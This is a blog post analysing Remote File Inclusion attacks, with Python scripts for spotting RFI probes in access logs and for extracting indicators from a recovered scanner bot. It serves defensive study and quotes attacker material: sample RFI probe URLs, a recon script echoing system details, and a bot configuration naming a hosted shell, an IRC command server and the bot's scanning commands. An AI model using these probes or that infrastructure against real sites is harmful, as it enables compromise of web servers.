Remote File Inclusion Attacks – pt1

One of the constant threats on the internet is the Remote File Inclusion (RFI) attack. This class of attack is simple to execute and can yield very valuable results for the attacker. With the multitude of web applications out there, new vulnerabilities are constantly being discovered. The subject is rather large, so I will make this a series of posts discussing the tools, tactics and infrastructure used in these attacks.

For those needing more information on what RFI attacks are and how they work, please see this Wikipedia article.

To start off, RFI attacks are easy to find. If you have a website, chances are an automated attack has already paid it a visit. Here are a few things to check for when looking through web access logs:

File names beginning with “id”
Files with a .txt extension (exclude robots.txt and this list will be very small)
404 errors
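As an added example (not code from the original post), here is a Python script that applies the three checks above to Apache/nginx combined-format access-log lines. It goes one step beyond the list by also flagging a query-string value that is itself a full URL, since that is the defining signature of an RFI probe. The log lines are constructed for the example, and the flagged ones use documentation IP ranges.

```python
"""Flag access-log lines that show the RFI indicators listed in the post.

Indicators: a requested file name starting with "id", a .txt file other than
robots.txt (in the path or inside a query-string value), a 404 response, and,
as a generalisation, a query-string value that is itself a full URL.
Sample log lines are constructed for this example.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format:
# ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines: two scanner probes, three ordinary requests.
LOG_LINES = [
    '203.0.113.5 - - [10/Apr/2008:10:15:02 +0000] "GET /index.php?page=http://198.51.100.7/~x/id.txt? HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"',
    '203.0.113.5 - - [10/Apr/2008:10:15:03 +0000] "GET /modules/foo.php?inc=http://198.51.100.7/bot.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"',
    '192.0.2.44 - - [10/Apr/2008:10:16:10 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Apr/2008:10:16:11 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Apr/2008:10:16:12 +0000] "GET /missing/page HTTP/1.1" 404 190 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return a dict with ip, time, method, target, status; None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def _basename(url_or_path):
    """Last path component of a URL or path; tolerant of values urlsplit rejects."""
    try:
        path = urlsplit(url_or_path).path
    except ValueError:
        path = url_or_path
    return path.rsplit("/", 1)[-1]


def rfi_indicators(entry):
    """Return the names of the indicators triggered by one parsed log entry."""
    target = urlsplit(entry["target"])
    names = [_basename(target.path)]
    remote_refs = []
    # Look inside every query-string value: RFI probes put the remote file there.
    for _, value in parse_qsl(target.query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://", "ftp://")):
            remote_refs.append(value)
        names.append(_basename(value))

    hits = []
    if any(n.lower().startswith("id") for n in names):
        hits.append("id-prefixed file name")
    if any(n.lower().endswith(".txt") and n.lower() != "robots.txt" for n in names):
        hits.append(".txt file (not robots.txt)")
    if entry["status"] == 404:
        hits.append("404 response")
    if remote_refs:
        hits.append("remote URL in query parameter")
    return hits


def scan_log(lines):
    """Return (ip, target, status, indicators) for every line triggering at least one indicator."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        hits = rfi_indicators(entry)
        if hits:
            findings.append((entry["ip"], entry["target"], entry["status"], hits))
    return findings


if __name__ == "__main__":
    for ip, target, status, hits in scan_log(LOG_LINES):
        print(f"{ip} {status} {target}")
        print("    -> " + ", ".join(hits))
```

Run it over a real log with `scan_log(open("access.log"))`. The "id" prefix and the 404 check are deliberately noisy on their own (a lone 404 or a file called index-data.txt will trip them); the combination of several indicators on one line, or the same source IP tripping them repeatedly, is what separates a scanner from ordinary traffic.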

The steps involved in most RFI attacks are as follows:

  1. Attackers scan the internet via a bot that checks several search engines to find vulnerable web applications.
  2. Once a vulnerable site is found, it is marked with an ID tag of sorts.
  3. The scanner then tracks these ID tags and uploads a second script to gather basic information on the machine.
  4. The attacker then uploads a PHP shell, which gives them control over the device.
  5. More tools are uploaded, such as other PHP IRC bots.

To get a little inspiration I headed over to honeynet.cz and looked through some recent RFI attacks they received. To truly understand an attack, it is best to obtain the attacker's code. After a few minutes of searching, I found an RFI attack site whose directory was unsecured (note that this is all publicly obtainable information).

Honeynet.cz RFI attacker: hxxp://70.38.120.161/~anyhost/wp-content/uploads/chid

The chid file is a text file which is used in step 3 of the list above. Here are some of its contents:

echo "rzor was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";

Attacker files

bot.txt is fairly self-explanatory: it is an RFI scanning bot which contains everything you need to know, including:

IRC server / channel the bot connects to
Administrative credentials to disable the bot
Commands accepted
Attacker information
Related URLs

Here is some of the pertinent information:

my $id = "hxxp://70.38.120.161/~anyhost/wp-content/uploads/chid?"; #Your RFI Response
my $shell = "hxxp://skoolage.angelfire.com/other.txt?"; #Shell printed on the Vulnerable Site
my $ircd = "irc.ccpower.org"; #Irc-Server
my $port = "6667"; #Irc-Server Port
my $chan1 = "#rfi"; #Chan for Scan
my $chan2 = "#rfi"; #Results will be printed here too
my $nick = "[Lock]|ON|[stratos][".int(rand(1000))."]"; #Nick
my @admins = ("rzor");
my $killpwd = "XXXXX"; #Password to Kill the Bot
my $chidpwd = "XXXXX"; #Password to change the RFI Response

[+] Coded by rzor
[+] Contact: rzor[at]Gmail[dot]Com
[+] Keep it private !
[+] *New release, more fun ;)
[+] *Updated to: 4/11/2008

!rfi <bug> <dork> -p <sites/proc> > Start the RFI Scanner
!lfi <bug> <dork> > Start the LFI Scanner
!sql <bug> <dork> -p <sites/proc> > Start the SQL Injection Scanner
!rce <bug> <dork> -p <sites/proc> > Start the RCE Scanner

This bot (Scanner V6) was originally written by 0sirys; each attacker usually re-brands it with their own nickname and email. You can find websites compromised with Osirys's bot by googling for "Osirys was here".

The directory contains another RFI scanning bot (rfiscan.txt) and some other curious tools in the /rapi and /tr directories. The /rapi/ directory contains a script to check whether a given Rapidshare account is valid. I don't know the specific reason for checking this, but if anyone does know, please leave a comment. The /tr/ directory contains a script (written in Spanish) to harvest email accounts by searching various search engines.
Harvester
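As an added example (not code from the post, nor from the bot's author), here is a Python script that pulls the network indicators out of a bot configuration block like the one quoted above, so an analyst can turn a recovered bot.txt into a blocklist and a set of things to look for in proxy and firewall logs. The input is the excerpt from the post with its defanged hxxp URLs; the script assumes the file uses plain Perl `my $var = "..."` assignments and the variable names of that excerpt, and it deliberately leaves the passwords out of the result.

```python
"""Pull network indicators out of the configuration block of a recovered RFI scanner bot.

The sample input is the bot.txt excerpt quoted in the post (URLs defanged as hxxp).
The variable names assumed here ($id, $shell, $ircd, $port, $chan1, $chan2, $nick,
@admins) are the ones that excerpt uses; other bots may differ.
"""
import re

BOT_CONFIG = r'''
my $id = "hxxp://70.38.120.161/~anyhost/wp-content/uploads/chid?"; #Your RFI Response
my $shell = "hxxp://skoolage.angelfire.com/other.txt?"; #Shell printed on the Vulnerable Site
my $ircd = "irc.ccpower.org"; #Irc-Server
my $port = "6667"; #Irc-Server Port
my $chan1 = "#rfi"; #Chan for Scan
my $chan2 = "#rfi"; #Results will be printed here too
my $nick = "[Lock]|ON|[stratos][".int(rand(1000))."]"; #Nick
my @admins = ("rzor");
my $killpwd = "XXXXX"; #Password to Kill the Bot
my $chidpwd = "XXXXX"; #Password to change the RFI Response
'''

# `my $name = <initializer>;` optionally followed by a # comment
ASSIGN_RE = re.compile(r'^\s*my\s+[\$@](\w+)\s*=\s*(.*?);\s*(?:#.*)?$')
# every double-quoted literal in an initializer (a concatenated value yields several)
STR_RE = re.compile(r'"([^"]*)"')
# scheme plus host of a (possibly defanged) URL
URL_RE = re.compile(r'^(?:hxxps?|https?|ftp)://([^/?#]+)', re.IGNORECASE)


def parse_perl_config(text):
    """Map each `my` variable to the list of double-quoted literals in its initializer."""
    cfg = {}
    for line in text.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            name, rhs = m.groups()
            cfg[name] = STR_RE.findall(rhs)
    return cfg


def extract_iocs(cfg):
    """Summarise URLs, hosts, IRC rendezvous, channels, admin nicks and the bot's nick prefix."""
    urls, hosts = [], set()
    for values in cfg.values():
        for v in values:
            m = URL_RE.match(v)
            if m:
                urls.append(v)
                hosts.add(m.group(1).lower())
    irc = None
    if cfg.get("ircd"):
        irc = (cfg["ircd"][0], int(cfg["port"][0]) if cfg.get("port") else None)
        hosts.add(cfg["ircd"][0].lower())
    channels = set(cfg.get("chan1", []) + cfg.get("chan2", []))
    return {
        "urls": urls,
        "hosts": sorted(hosts),
        "irc": irc,
        "channels": sorted(channels),
        "admins": cfg.get("admins", []),
        # the nick is built at runtime from a fixed prefix plus a random number,
        # so only the literal prefix is useful as an indicator
        "nick_prefix": cfg["nick"][0] if cfg.get("nick") else None,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(parse_perl_config(BOT_CONFIG)).items():
        print(f"{key}: {value}")
```

The `hosts` list is what you would feed to an egress blocklist, and the `irc` tuple plus `nick_prefix` are what to search for in outbound connection logs from any web server suspected of running the bot.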

As you can see, RFI attacks can be quite deadly but can be easy to dissect. The series will continue in the next few days with more RFI attacks. Copies of these files are available to members of the security community; please drop me a line if you are interested.

2 comments to Remote File Inclusion Attacks – pt1

  • Jaun Millalonco

    My first visit here, found the blog accidentally really, and I just wanted to say I’ve enjoyed my visit and had some good reads while here :)
    Juan

  • Jos

    If you run Drupal, install the RFI report module, it will report all failed RFI attacks with full details on the attacker, location of the RFI scripts, etc.